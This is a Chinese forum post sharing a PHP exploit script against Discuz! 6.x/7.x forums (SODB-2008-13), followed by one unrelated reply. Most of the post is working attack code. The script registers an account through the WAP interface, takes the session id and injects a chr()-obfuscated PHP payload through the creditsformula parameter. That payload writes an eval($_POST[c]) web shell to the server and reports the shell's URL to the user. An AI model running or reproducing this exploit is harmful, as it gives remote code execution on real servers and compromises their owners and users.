Discuz! 6.x/7.x SODB-2008-13 Exp Exp, Discuz

柔肠寸断

Discuz! 6.x/7.x SODB-2008-13 Exp

1. #!/usr/bin/php
   
2. <?php
   
3. /**
   
4. * Discuz! 6.x/7.x SODB-2008-13 Exp
   
5. * By www.3ast.com.cn
   
6. * 文件中注释的变量值请自行修改
   
7. */
   
8. 
   
9. $host = 'www.80vul.com';
   
10. // 服务器域名或IP
    
11. $path = '/discuz/';
    
12. // 程序所在的路径
    
13. $key  = 0;
    
14. // 上面的变量编辑好后，请将此处的值改为1
    
15. 
    
16. if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)
    
17. exit("专业点好不,先看看里面的注释 -,-\n");
    
18. 
    
19. error_reporting(7);
    
20. ini_set('max_execution_time', 0);
    
21. 
    
22. $key = time();
    
23. $cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1';
    
24. $resp = send();
    
25. 
    
26. preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid);
    
27. 
    
28. if (!$sid)
    
29. exit("哦,大概是没有开启WAP注册吧 -,-\n");
    
30. 
    
31. $cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}';
    
32. send();
    
33. 
    
34. $shell = 'http://'.$host.$path.'forumdata/cache/eval.php';
    
35. 
    
36. if (file_get_contents($shell) == '80vul')
    
37. exit("好了,去看看你的WebShell吧:\t$shell\n里面的代码是:\t<?eval(\$_POST[c])?>\n别告诉我你不会用 -,-\n");
    
38. else
    
39. exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");
    
40. 
    
41. function send()
    
42. {
    
43. global $host, $path, $url, $cmd;
    
44. 
    
45. $data = "POST ".$path."wap/index.php  HTTP/1.1\r\n";
    
46. $data .= "Accept: */*\r\n";
    
47. $data .= "Accept-Language: zh-cn\r\n";
    
48. $data .= "Referer: http://$host$path\r\n";
    
49. $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    
50. $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
    
51. $data .= "Host: $host\r\n";
    
52. $data .= "Connection: Close\r\n";
    
53. $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
    
54. $data .= $cmd;
    
55. 
    
56. $fp = fsockopen($host, 80);
    
57. fputs($fp, $data);
    
58. 
    
59. $resp = '';
    
60. 
    
61. while ($fp && !feof($fp))
    
62. $resp .= fread($fp, 1024);
    
63. 
    
64. return $resp;
    
65. }
    
66. 
    
67. ?>

复制代码

wmmy

看到你这篇帖子的发布日期 2008.11.15
我想杀人。。。。:@ :@ :@